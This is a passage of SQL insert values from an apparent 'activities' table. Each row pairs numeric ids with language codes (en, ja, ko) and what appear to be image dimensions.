('activities', 0, 9, 150, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 150, 'ja', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 150, 'ko', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 187, 'en', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 187, 'ja', 0, 16, '', '', 1500, 1000),
('activities', 0, 9, 187, 'ko', 0, 16, '', '', 1500, 1000),
('activities', 0, 17, 57, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 58, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 119, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 119, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 120, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 120, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 120, 'ko', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 148, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 148, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 148, 'ko', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 149, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 149, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 149, 'ko', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 188, 'en', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 188, 'ja', 0, 29, '', '', 1080, 810),
('activities', 0, 17, 188, 'ko', 0, 29, '', '', 1080, 810),
('activities', 0, 19, 65, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 85, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 125, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 125, 'ja', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 126, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 126, 'ja', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 126, 'ko', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 186, 'en', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 186, 'ja', 0, 30, '', '', 1080, 810),
('activities', 0, 19, 186, 'ko', 0, 30, '', '', 1080, 810),
('activities', 0, 20, 66, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 84, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 123, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 123, 'ja', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 124, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 124, 'ja', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 124, 'ko', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 185, 'en', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 185, 'ja', 0, 32, '', '', 1080, 810),
('activities', 0, 20, 185, 'ko', 0, 32, '', '', 1080, 810),
('activities', 0, 28, 217, 'en', 0, 80, '', '', 854, 641),
('activities', 0, 28, 218, 'en', 0, 81, '', '', 854, 451),
('activities', 0, 28, 219, 'en', 0, 81, '', '', 854, 451),
('activities', 0, 28, 219, 'ja', 0, 81, '', '', 854, 451),
('activities', 0, 28, 220, 'en', 0, 81, '', '', 854, 451),
('activities', 0, 28, 220, 'ja', 0, 81, '', '', 854, 451),
('activities', 0, 28, 220, 'ko', 0, 81, '', '', 854, 451),
('activities', 0, 29, 221, 'en', 0, 83, '', '', 720, 540),
('activities', 0, 29, 222, 'en', 0, 83, '', '', 720, 540),
('activities', 0, 29, 222, 'ja', 0, 83, '', '', 720, 540),
('activities', 0, 29, 223, 'en', 0, 83, '', '', 720, 540),
('activities', 0, 29, 223, 'ja', 0, 83, '', '', 720, 540),
('activities', 0, 29, 223, 'ko', 0, 83, '', '', 720, 540),
('activities', 0, 68, 424, 'en', 0, 361, '', '', 1600, 1200),
('activities', 0, 68, 424, 'ja', 0, 361, '', '', 1600, 1200),
('activities', 0, 70, 427, 'en', 0, 379, '', '', 885, 1600),
('activities', 0, 70, 430, 'en', 0, 379, '', '', 885, 1600),
('activities', 0, 70, 430, 'ja', 0, 379, '', '', 885, 1600),
('activities', 0, 71, 428, 'en', 0, 381, '', '', 900, 1600),
('activities', 0, 71, 429, 'en', 0, 381, '', '', 900, 1600),
('activities', 0, 71, 431, 'en', 0, 381, '', '', 900, 1600),
('activities', 0, 71, 431, 'ja', 0, 381, '', '', 900, 1600),
('activities', 0, 72, 432, 'en', 0, 382, '', '', 885, 1600),
('activities', 0, 72, 433, 'en', 0, 382, '', '', 885, 1600),
('activities', 0, 72, 434, 'en', 0, 382, '', '', 885, 1600),
('activities', 0, 72, 435, 'en', 0, 382, '', '', 885, 1600),
('activities', 0, 72, 435, 'ja', 0, 382, '', '', 885, 1600),
('activities', 0, 73, 436, 'en', 0, 388, '', '', 854, 641),
('activities', 0, 73, 439, 'en', 0, 388, '', '', 854, 641),
('activities', 0, 73, 439, 'ja', 0, 388, '', '', 854, 641),
('activities', 0, 74, 437, 'en', 0, 389, '', '', 885, 1600),
('activities', 0, 74, 438, 'en', 0, 389, '', '', 885, 1600),
('activities', 0, 74, 438, 'ja', 0, 389, '', '', 885, 1600),
('activities', 0, 74, 440, 'en', 0, 389, '', '', 885, 1600),
('activities', 0, 74, 440, 'ja', 0, 389, '', '', 885, 1600),
('activities', 0, 75, 441, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 442, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 442, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 443, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 443, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 444, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 444, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 446, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 446, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 448, 'en', 0, 390, '', '', 900, 1600),
('activities', 0, 75, 448, 'ja', 0, 390, '', '', 900, 1600),
('activities', 0, 76, 445, 'en', 0, 395, '', '', 854, 641),
('activities', 0, 76, 447, 'en', 0, 395, '', '', 854, 641),
('activities', 0, 76, 447, 'ja', 0, 395, '', '', 854, 641),
('activities', 0, 77, 449, 'en', 0, 400, '', '', 1600, 1200),
('activities', 0, 77, 450, 'en', 0, 400, '', '', 1600, 1200),
('activities', 0, 77, 450, 'ja', 0, 400, '', '', 1600, 1200),
('activities', 0, 78, 451, 'en', 0, 407, '', '', 1600, 900),
('activities', 0, 78, 452, 'en', 0, 407, '', '', 1600, 900),
('activities', 0, 78, 452, 'ja', 0, 407, '', '', 1600, 900),
('activities', 0, 79, 453, 'en', 0, 412, '', '', 1200, 1600),
('activities', 0, 80, 454, 'en', 0, 417, '', '', 1200, 1600),
('activities', 0, 80, 455, 'en', 0, 417, '', '', 1200, 1600),
('activities', 0, 80, 455, 'ja', 0, 417, '', '', 1200, 1600),
('activities', 0, 81, 456, 'en', 0, 419, '', '', 708, 1280),
('activities', 0, 81, 457, 'en', 0, 419, '', '', 708, 1280),
('activities', 0, 81, 457, 'ja', 0, 419, '', '', 708, 1280),
('activities', 0, 82, 458, 'en', 0, 420, '', '', 900, 1600),
('activities', 0, 82, 459, 'en', 0, 420, '', '', 900, 1600),
('activities', 0, 82, 459, 'ja', 0, 420, '', '', 900, 1600),
('activities', 0, 83, 460, 'en', 0, 423, '', '', 1314, 1080),
('activities', 0, 83, 464, 'en', 0, 423, '', '', 1314, 1080),
('activities', 0, 83, 464, 'ja', 0, 423, '', '', 1314, 1080),
('activities', 0, 84, 461, 'en', 0, 424, '', '', 900, 1600),
('activities', 0, 84, 465, 'en', 0, 424, '', '', 900, 1600),
('activities', 0, 84, 465, 'ja', 0, 424, '', '', 900, 1600),
('activities', 0, 85, 462, 'en', 0, 426, '', '', 708, 1280),
('activities', 0, 85, 463, 'en', 0, 426, '', '', 708, 1280),
('activities', 0, 85, 463, 'ja', 0, 426, '', '', 708, 1280),
('activities', 0, 86, 466, 'en', 0, 427, '', '', 1080, 1350),
('activities', 0, 86, 467, 'en', 0, 427, '', '', 1080, 1350),
('activities', 0, 86, 467, 'ja', 0, 427, '', '', 1080, 1350),
('activities', 0, 88, 470, 'en', 0, 428, '', '', 900, 504),
('activities', 0, 88, 471, 'en', 0, 428, '', '', 900, 504),
('activities', 0, 88, 471, 'ja', 0, 428, '', '', 900, 504),
('activities', 0, 89, 472, 'en', 0, 432, '', '', 1080, 711),
('activities', 0, 89, 473, 'en', 0, 432, '', '', 1080, 711),
('activities', 0, 89, 473, 'ja', 0, 432, '', '', 1080, 711),
('activities', 0, 90, 474, 'en', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 475, 'en', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 477, 'en', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 477, 'ja', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 478, 'en', 0, 433, '', '', 708, 1280),
('activities', 0, 90, 478, 'ja', 0, 433, '', '', 708, 1280),
('activities', 0, 91, 479, 'en', 0, 437, '', '', 900, 1600),
('activities', 0, 91, 480, 'en', 0, 437, '', '', 900, 1600),
('activities', 0, 91, 480, 'ja', 0, 437, '', '', 900, 1600),
('activities', 0, 92, 481, 'en', 0, 440, '', '', 900, 1600),
('activities', 0, 92, 482, 'en', 0, 440, '', '', 900, 1600),
('activities', 0, 92, 482, 'ja', 0, 440, '', '', 900, 1600),
('activities', 0, 93, 483, 'en', 0, 444, '', '', 1013, 1801),
('activities', 0, 93, 484, 'en', 0, 444, '', '', 1013, 1801),
('activities', 0, 93, 484, 'ja', 0, 444, '', '', 1013, 1801),
('activities', 0, 94, 485, 'en', 0, 447, '', '', 1013, 1801),
('activities', 0, 95, 486, 'en', 0, 466, '', '', 1600, 1205),
('activities', 0, 95, 487, 'en', 0, 466, '', '', 1600, 1205),
('activities', 0, 95, 487, 'ja', 0, 466, '', '', 1600, 1205),
('activities', 0, 95, 524, 'en', 0, 466, '', '', 1600, 1205),
('activities', 0, 95, 524, 'ja', 0, 466, '', '', 1600, 1205),
('activities', 0, 96, 488, 'en', 0, 469, '', '', 1013, 1801),
('activities', 0, 96, 489, 'en', 0, 469, '', '', 1013, 1801),
('activities', 0, 96, 489, 'ja', 0, 469, '', '', 1013, 1801),
('activities', 0, 97, 490, 'en', 0, 470, '', '', 900, 1091),
('activities', 0, 97, 491, 'en', 0, 470, '', '', 900, 1091),
('activities', 0, 97, 491, 'ja', 0, 470, '', '', 900, 1091),
('activities', 0, 98, 492, 'en', 0, 491, '', '', 960, 1280),
('activities', 0, 98, 493, 'en', 0, 491, '', '', 960, 1280),
('activities', 0, 98, 493, 'ja', 0, 491, '', '', 960, 1280),
('activities', 0, 99, 494, 'en', 0, 492, '', '', 898, 1190),
('activities', 0, 99, 495, 'en', 0, 492, '', '', 898, 1190),
('activities', 0, 99, 495, 'ja', 0, 492, '', '', 898, 1190),
('activities', 0, 100, 496, 'en', 0, 496, '', '', 591, 787),
('activities', 0, 100, 497, 'en', 0, 496, '', '', 591, 787),
('activities', 0, 100, 497, 'ja', 0, 496, '', '', 591, 787),
('activities', 0, 101, 498, 'en', 0, 498, '', '', 1080, 1920),
('activities', 0, 101, 499, 'en', 0, 498, '', '', 1080, 1920),
('activities', 0, 101, 499, 'ja', 0, 498, '', '', 1080, 1920),
('activities', 0, 102, 500, 'en', 0, 507, '', '', 300, 403),
('activities', 0, 102, 501, 'en', 0, 507, '', '', 300, 403),
('activities', 0, 102, 501, 'ja', 0, 507, '', '', 300, 403),
('activities', 0, 103, 502, 'en', 0, 508, '', '', 960, 758),
('activities', 0, 103, 505, 'en', 0, 508, '', '', 960, 758),
('activities', 0, 103, 505, 'ja', 0, 508, '', '', 960, 758),
('activities', 0, 104, 503, 'en', 0, 511, '', '', 390, 508),
('activities', 0, 104, 504, 'en', 0, 511, '', '', 390, 508),
('activities', 0, 104, 504, 'ja', 0, 511, '', '', 390, 508),
('activities', 0, 105, 506, 'en', 0, 512, '', '', 1080, 571),
('activities', 0, 105, 507, 'en', 0, 512, '', '', 1080, 571),
('activities', 0, 105, 507, 'ja', 0, 512, '', '', 1080, 571),
('activities', 0, 106, 508, 'en', 0, 518, '', '', 1170, 1557),
('activities', 0, 106, 509, 'en', 0, 518, '', '', 1170, 1557),
('activities', 0, 106, 509, 'ja', 0, 518, '', '', 1170, 1557),
('activities', 0, 107, 510, 'en', 0, 520, '', '', 443, 561),
('activities', 0, 107, 511, 'en', 0, 520, '', '', 443, 561),
('activities', 0, 107, 511, 'ja', 0, 520, '', '', 443, 561),
('activities', 0, 108, 512, 'en', 0, 528, '', '', 1080, 1533),
('activities', 0, 108, 513, 'en', 0, 528, '', '', 1080, 1533),
('activities', 0, 108, 513, 'ja', 0, 528, '', '', 1080, 1533),
('activities', 0, 109, 514, 'en', 0, 530, '', '', 420, 540),
('activities', 0, 109, 515, 'en', 0, 530, '', '', 420, 540),
('activities', 0, 109, 515, 'ja', 0, 530, '', '', 420, 540),
('activities', 0, 110, 516, 'en', 0, 532, '', '', 1080, 1953),
('activities', 0, 110, 517, 'en', 0, 532, '', '', 1080, 1953),
('activities', 0, 110, 517, 'ja', 0, 532, '', '', 1080, 1953),
('activities', 0, 111, 518, 'en', 0, 538, '', '', 1080, 810),
('activities', 0, 111, 519, 'en', 0, 538, '', '', 1080, 810),
('activities', 0, 111, 519, 'ja', 0, 538, '', '', 1080, 810),
('activities', 0, 112, 521, 'en', 0, 541, '', '', 854, 633),
('activities', 0, 112, 521, 'ja', 0, 541, '', '', 854, 633),
('activities', 0, 113, 522, 'en', 0, 546, '', '', 1080, 810),
('activities', 0, 113, 523, 'en', 0, 546, '', '', 1080, 810),
('activities', 0, 113, 523, 'ja', 0, 546, '', '', 1080, 810),
('activities', 0, 114, 525, 'en', 0, 549, '', '', 900, 1600),
('activities', 0, 114, 526, 'en', 0, 549, '', '', 900, 1600),
('activities', 0, 114, 526, 'ja', 0, 549, '', '', 900, 1600),
('activities', 0, 115, 527, 'en', 0, 554, '', '', 900, 1600),
('activities', 0, 115, 528, 'en', 0, 554, '', '', 900, 1600),
('activities', 0, 115, 528, 'ja', 0, 554, '', '', 900, 1600),
('activities', 0, 116, 529, 'en', 0, 563, '', '', 960, 1280),
('activities', 0, 116, 531, 'en', 0, 563, '', '', 960, 1280),
('activities', 0, 116, 531, 'ja', 0, 563, '', '', 960, 1280),
('activities', 0, 117, 530, 'en', 0, 565, '', '', 1080, 1953),
('activities', 0, 117, 532, 'en', 0, 565, '', '', 1080, 1953),
('activities', 0, 117, 532, 'ja', 0, 565, '', '', 1080, 1953),
('activities', 0, 118, 533, 'en', 0, 567, '', '', 526, 951),
('activities', 0, 118, 534, 'en', 0, 567, '', '', 526, 951),
('activities', 0, 118, 534, 'ja', 0, 567, '', '', 526, 951),
('activities', 0, 119, 535, 'ja', 0, 569, '', '', 827, 826),
('activities', 0, 119, 536, 'en', 0, 569, '', '', 827, 826),
('activities', 0, 119, 537, 'en', 0, 569, '', '', 827, 826),
('activities', 0, 119, 537, 'ja', 0, 569, '', '', 827, 826),
('activities', 0, 120, 538, 'en', 0, 587, '', '', 1080, 487),
('activities', 0, 120, 539, 'en', 0, 587, '', '', 1080, 487),
('activities', 0, 120, 539, 'ja', 0, 587, '', '', 1080, 487),
('activities', 0, 121, 540, 'en', 0, 590, '', '', 1080, 1953),
('activities', 0, 121, 541, 'en', 0, 590, '', '', 1080, 1953),
('activities', 0, 121, 541, 'ja', 0, 590, '', '', 1080, 1953),
('activities', 0, 122, 542, 'en', 0, 599, '', '', 854, 641),
('activities', 0, 122, 544, 'en', 0, 599, '', '', 854, 641),
('activities', 0, 122, 544, 'ja', 0, 599, '', '', 854, 641),
('activities', 0, 123, 543, 'en', 0, 602, '', '', 1080, 1953),
('activities', 0, 123, 545, 'en', 0, 602, '', '', 1080, 1953),
('activities', 0, 123, 545, 'ja', 0, 602, '', '', 1080, 1953),
('activities', 0, 124, 546, 'en', 0, 604, '', '', 1080, 1953),
('activities', 0, 124, 547, 'en', 0, 604, '', '', 1080, 1953),
('activities', 0, 124, 547, 'ja', 0, 604, '', '', 1080, 1953),
('activities', 0, 125, 548, 'en', 0, 607, '', '', 1080, 1953),
('activities', 0, 125, 549, 'en', 0, 607, '', '', 1080, 1953),
('activities', 0, 125, 549, 'ja', 0, 607, '', '', 1080, 1953),
('activities', 0, 126, 550, 'en', 0, 611, '', '', 1080, 810),
('activities', 0, 126, 551, 'en', 0, 611, '', '', 1080, 810),
('activities', 0, 126, 551, 'ja', 0, 611, '', '', 1080, 810),
('activities', 0, 127, 552, 'en', 0, 615, '', '', 526, 951),
('activities', 0, 127, 553, 'en', 0, 615, '', '', 526, 951),
('activities', 0, 127, 553, 'ja', 0, 615, '', '', 526, 951),
('activities', 0, 128, 554, 'en', 0, 620, '', '', 1080, 1953),
('activities', 0, 128, 555, 'en', 0, 620, '', '', 1080, 1953),
('activities', 0, 128, 555, 'ja', 0, 620, '', '', 1080, 1953),
('activities', 0, 129, 556, 'en', 0, 624, '', '', 1080, 1953),
('activities', 0, 129, 557, 'en', 0, 624, '', '', 1080, 1953),
('activities', 0, 129, 557, 'ja', 0, 624, '', '', 1080, 1953),
('activities', 0, 130, 558, 'en', 0, 631, '', '', 1080, 1953),
('activities', 0, 130, 559, 'en', 0, 631, '', '', 1080, 1953),
('activities', 0, 130, 559, 'ja', 0, 631, '', '', 1080, 1953),
('activities', 0, 131, 560, 'en', 0, 633, '', '', 1080, 1953),
('activities', 0, 131, 561, 'en', 0, 633, '', '', 1080, 1953),
('activities', 0, 131, 561, 'ja', 0, 633, '', '', 1080, 1953),
('activities', 0, 132, 562, 'en', 0, 658, '', '', 900, 1600),
('activities', 0, 132, 563, 'en', 0, 658, '', '', 900, 1600),
('activities', 0, 132, 563, 'ja', 0, 658, '', '', 900, 1600),
('activities', 0, 133, 564, 'en', 0, 669, '', '', 960, 1280),
('activities', 0, 133, 565, 'en', 0, 669, '', '', 960, 1280),
('activities', 0, 133, 565, 'ja', 0, 669, '', '', 960, 1280),
('activities', 0, 134, 566, 'en', 0, 680, '', '', 483, 854),
('activities', 0, 134, 567, 'en', 0, 680, '', '', 483, 854),
('activities', 0, 134, 567, 'ja', 0, 680, '', '', 483, 854),
('activities', 0, 135, 568, 'en', 0, 690, '', '', 1080, 486),
('activities', 0, 135, 569, 'en', 0, 690, '', '', 1080, 486),
('activities', 0, 135, 569, 'ja', 0, 690, '', '', 1080, 486),
('activities', 0, 136, 570, 'en', 0, 699, '', '', 1080, 608),
('activities', 0, 136, 571, 'en', 0, 699, '', '', 1080, 608),
('activities', 0, 136, 571, 'ja', 0, 699, '', '', 1080, 608),
('activities', 0, 137, 572, 'en', 0, 703, '', '', 898, 1600),
('activities', 0, 137, 573, 'en', 0, 703, '', '', 898, 1600),
('activities', 0, 137, 573, 'ja', 0, 703, '', '', 898, 1600),
('activities', 0, 138, 574, 'en', 0, 712, '', '', 854, 641),
('activities', 0, 138, 575, 'en', 0, 712, '', '', 854, 641),
('activities', 0, 138, 575, 'ja', 0, 712, '', '', 854, 641),
('activities', 0, 139, 576, 'en', 0, 715, '', '', 899, 1601),
('activities', 0, 139, 577, 'en', 0, 715, '', '', 899, 1601),
('activities', 0, 139, 577, 'ja', 0, 715, '', '', 899, 1601),
('activities', 0, 140, 578, 'en', 0, 723, '', '', 1080, 810),
('activities', 0, 140, 579, 'en', 0, 723, '', '', 1080, 810),
('activities', 0, 140, 579, 'ja', 0, 723, '', '', 1080, 810),
('activities', 0, 141, 580, 'en', 0, 727, '', '', 903, 1600),
('activities', 0, 141, 581, 'en', 0, 727, '', '', 903, 1600),
('activities', 0, 141, 581, 'ja', 0, 727, '', '', 903, 1600),
('activities', 0, 142, 582, 'en', 0, 733, '', '', 1080, 813),
('activities', 0, 142, 583, 'en', 0, 733, '', '', 1080, 813),
('activities', 0, 142, 583, 'ja', 0, 733, '', '', 1080, 813),
('activities', 0, 143, 584, 'en', 0, 736, '', '', 906, 1600),
('activities', 0, 143, 585, 'en', 0, 736, '', '', 906, 1600),
('activities', 0, 143, 585, 'ja', 0, 736, '', '', 906, 1600),
('activities', 0, 144, 587, 'en', 0, 740, '', '', 899, 1600),
('activities', 0, 144, 587, 'ja', 0, 740, '', '', 899, 1600),
('activities', 0, 145, 588, 'en', 0, 742, '', '', 815, 790),
('activities', 0, 145, 589, 'en', 0, 742, '', '', 815, 790),
('activities', 0, 145, 589, 'ja', 0, 742, '', '', 815, 790),
('activities', 0, 146, 590, 'en', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 591, 'en', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 591, 'ja', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 592, 'en', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 592, 'ja', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 593, 'en', 0, 748, '', '', 708, 1280),
('activities', 0, 146, 593, 'ja', 0, 748, '', '', 708, 1280),
('activities', 0, 147, 594, 'en', 0, 759, '', '', 254, 207),
('activities', 0, 147, 595, 'en', 0, 759, '', '', 254, 207),
('activities', 0, 147, 595, 'ja', 0, 759, '', '', 254, 207),
('activities', 0, 148, 596, 'en', 0, 761, '', '', 1080, 1190),
('activities', 0, 148, 597, 'en', 0, 761, '', '', 1080, 1190),
('activities', 0, 148, 597, 'ja', 0, 761, '', '', 1080, 1190),
('activities', 0, 149, 598, 'en', 0, 765, '', '', 708, 1280),
('activities', 0, 150, 599, 'en', 0, 774, '', '', 1080, 813),
('activities', 0, 150, 600, 'en', 0, 774, '', '', 1080, 813),
('activities', 0, 150, 600, 'ja', 0, 774, '', '', 1080, 813),
('activities', 0, 151, 601, 'en', 0, 776, '', '', 1013, 1801),
('activities', 0, 151, 602, 'en', 0, 776, '', '', 1013, 1801),
('activities', 0, 151, 602, 'ja', 0, 776, '', '', 1013, 1801),
('activities', 0, 152, 603, 'en', 0, 778, '', '', 1013, 1801),
('activities', 0, 152, 604, 'en', 0, 778, '', '', 1013, 1801),
('activities', 0, 152, 604, 'ja', 0, 778, '', '', 1013, 1801),
('activities', 0, 153, 605, 'en', 0, 785, '', '', 1263, 1800),
('activities', 0, 153, 606, 'en', 0, 785, '', '', 1263, 1800),
('activities', 0, 153, 606, 'ja', 0, 785, '', '', 1263, 1800),
('activities', 0, 154, 607, 'en', 0, 790, '', '', 1200, 1600),
('activities', 0, 154, 608, 'en', 0, 790, '', '', 1200, 1600),
('activities', 0, 154, 608, 'ja', 0, 790, '', '', 1200, 1600),
('activities', 0, 154, 609, 'en', 0, 790, '', '', 1200, 1600),
('activities', 0, 154, 609, 'ja', 0, 790, '', '', 1200, 1600),
('activities', 0, 156, 612, 'en', 0, 795, '', '', 1200, 1600),
('activities', 0, 156, 613, 'en', 0, 795, '', '', 1200, 1600),
('activities', 0, 156, 613, 'ja', 0, 795, '', '', 1200, 1600),
('activities', 0, 157, 614, 'ja', 0, 796, '', '', 1600, 1200),
('activities', 0, 157, 615, 'en', 0, 796, '', '', 1600, 1200),
('activities', 0, 157, 615, 'ja', 0, 796, '', '', 1600, 1200),
('activities', 0, 160, 660, 'en', 0, 847, '', '', 648, 908),
('activities', 0, 160, 660, 'ja', 0, 847, '', '', 648, 908),
('activities', 0, 161, 657, 'en', 0, 846, '', '', 648, 908),
('activities', 0, 161, 657, 'ja', 0, 846, '', '', 648, 908),
('activities', 0, 161, 658, 'en', 0, 846, '', '', 648, 908),
('activities', 0, 161, 658, 'ja', 0, 846, '', '', 648, 908),
('activities', 0, 161, 659, 'en', 0, 846, '', '', 648, 908),
('activities', 0, 161, 659, 'ja', 0, 846, '', '', 648, 908),
('activities', 0, 164, 628, 'en', 0, 807, '', '', 1200, 1600),
('activities', 0, 164, 629, 'en', 0, 807, '', '', 1200, 1600),
('activities', 0, 164, 629, 'ja', 0, 807, '', '', 1200, 1600),
('activities', 0, 165, 630, 'en', 0, 809, '', '', 1600, 1200),
('activities', 0, 165, 631, 'en', 0, 809, '', '', 1600, 1200),
('activities', 0, 165, 631, 'ja', 0, 809, '', '', 1600, 1200),
('activities', 0, 166, 632, 'ja', 0, 816, '', '', 1052, 1452),
('activities', 0, 166, 633, 'en', 0, 816, '', '', 1052, 1452),
('activities', 0, 166, 634, 'en', 0, 816, '', '', 1052, 1452),
('activities', 0, 166, 634, 'ja', 0, 816, '', '', 1052, 1452),
('activities', 0, 167, 635, 'en', 0, 817, '', '', 854, 641),
('activities', 0, 167, 636, 'en', 0, 817, '', '', 854, 641),
('activities', 0, 167, 636, 'ja', 0, 817, '', '', 854, 641),
('activities', 0, 168, 637, 'en', 0, 819, '', '', 1038, 1402),
('activities', 0, 168, 638, 'en', 0, 819, '', '', 1038, 1402),
('activities', 0, 168, 638, 'ja', 0, 819, '', '', 1038, 1402),
('activities', 0, 169, 639, 'en', 0, 820, '', '', 1205, 1601),
('activities', 0, 169, 640, 'en', 0, 820, '', '', 1205, 1601),
('activities', 0, 169, 640, 'ja', 0, 820, '', '', 1205, 1601),
('activities', 0, 170, 641, 'en', 0, 822, '', '', 1600, 1237),
('activities', 0, 170, 642, 'en', 0, 822, '', '', 1600, 1237),
('activities', 0, 170, 642, 'ja', 0, 822, '', '', 1600, 1237),
('activities', 0, 171, 643, 'en', 0, 825, '', '', 1200, 1600),
('activities', 0, 171, 644, 'en', 0, 825, '', '', 1200, 1600),
('activities', 0, 171, 644, 'ja', 0, 825, '', '', 1200, 1600),
('activities', 0, 173, 647, 'en', 0, 830, '', '', 1280, 960),
('activities', 0, 173, 648, 'en', 0, 830, '', '', 1280, 960),
('activities', 0, 173, 648, 'ja', 0, 830, '', '', 1280, 960),
('activities', 0, 174, 649, 'en', 0, 834, '', '', 1203, 1600),
('activities', 0, 174, 650, 'en', 0, 834, '', '', 1203, 1600),
('activities', 0, 174, 650, 'ja', 0, 834, '', '', 1203, 1600),
('activities', 0, 175, 651, 'en', 0, 837, '', '', 720, 1280),
('activities', 0, 175, 652, 'en', 0, 837, '', '', 720, 1280),
('activities', 0, 175, 652, 'ja', 0, 837, '', '', 720, 1280),
('activities', 0, 176, 653, 'en', 0, 840, '', '', 1600, 1200),
('activities', 0, 176, 654, 'en', 0, 840, '', '', 1600, 1200),
('activities', 0, 176, 654, 'ja', 0, 840, '', '', 1600, 1200),
('activities', 0, 177, 655, 'en', 0, 843, '', '', 1080, 1440),
('activities', 0, 177, 656, 'en', 0, 843, '', '', 1080, 1440),
('activities', 0, 177, 656, 'ja', 0, 843, '', '', 1080, 1440),
('activities', 0, 178, 661, 'en', 0, 848, '', '', 1600, 1240),
('activities', 0, 178, 662, 'en', 0, 848, '', '', 1600, 1240),
('activities', 0, 178, 662, 'ja', 0, 848, '', '', 1600, 1240),
('activities', 0, 179, 663, 'en', 0, 849, '', '', 648, 908),
('activities', 0, 179, 664, 'en', 0, 849, '', '', 648, 908),
('activities', 0, 179, 664, 'ja', 0, 849, '', '', 648, 908),
('activities', 0, 180, 665, 'ja', 0, 850, '', '', 648, 908),
('activities', 0, 180, 666, 'en', 0, 850, '', '', 648, 908),
('activities', 0, 180, 667, 'en', 0, 850, '', '', 648, 908),
('activities', 0, 180, 667, 'ja', 0, 850, '', '', 648, 908),
('activities', 0, 181, 668, 'en', 0, 851, '', '', 709, 945),
('activities', 0, 181, 669, 'en', 0, 851, '', '', 709, 945),
('activities', 0, 181, 669, 'ja', 0, 851, '', '', 709, 945),
('activities', 0, 182, 670, 'en', 0, 852, '', '', 330, 390),
('activities', 0, 182, 671, 'en', 0, 852, '', '', 330, 390),
('activities', 0, 182, 671, 'ja', 0, 852, '', '', 330, 390),
('activities', 0, 183, 672, 'en', 0, 853, '', '', 1166, 1600),
('activities', 0, 183, 673, 'en', 0, 853, '', '', 1166, 1600),
('activities', 0, 183, 673, 'ja', 0, 853, '', '', 1166, 1600),
('activities', 0, 184, 674, 'en', 0, 854, '', '', 1200, 1600),
('activities', 0, 184, 675, 'en', 0, 854, '', '', 1200, 1600),
('activities', 0, 184, 675, 'ja', 0, 854, '', '', 1200, 1600),
('activities', 0, 185, 676, 'en', 0, 855, '', '', 648, 906),
('activities', 0, 185, 677, 'en', 0, 855, '', '', 648, 906),
('activities', 0, 185, 678, 'en', 0, 855, '', '', 648, 906),
('activities', 0, 185, 678, 'ja', 0, 855, '', '', 648, 906),
('activities', 0, 186, 679, 'en', 0, 856, '', '', 648, 906),
('activities', 0, 186, 680, 'en', 0, 856, '', '', 648, 906),
('activities', 0, 186, 680, 'ja', 0, 856, '', '', 648, 906),
('activities', 0, 187, 681, 'en', 0, 857, '', '', 648, 906),
('activities', 0, 187, 682, 'en', 0, 857, '', '', 648, 906),
('activities', 0, 187, 682, 'ja', 0, 857, '', '', 648, 906),
('activities', 0, 189, 685, 'en', 0, 858, '', '', 648, 906),
('activities', 0, 189, 686, 'en', 0, 858, '', '', 648, 906),
('activities', 0, 189, 686, 'ja', 0, 858, '', '', 648, 906),
('activities', 0, 190, 687, 'en', 0, 859, '', '', 648, 906),
('activities', 0, 190, 688, 'en', 0, 859, '', '', 648, 906),
('activities', 0, 190, 688, 'ja', 0, 859, '', '', 648, 906),
('activities', 0, 190, 689, 'en', 0, 859, '', '', 648, 906),
('activities', 0, 190, 689, 'ja', 0, 859, '', '', 648, 906),
('activities', 0, 191, 690, 'en', 0, 860, '', '', 648, 906),
('activities', 0, 191, 691, 'en', 0, 860, '', '', 648, 906),
('activities', 0, 191, 691, 'ja', 0, 860, '', '', 648, 906),
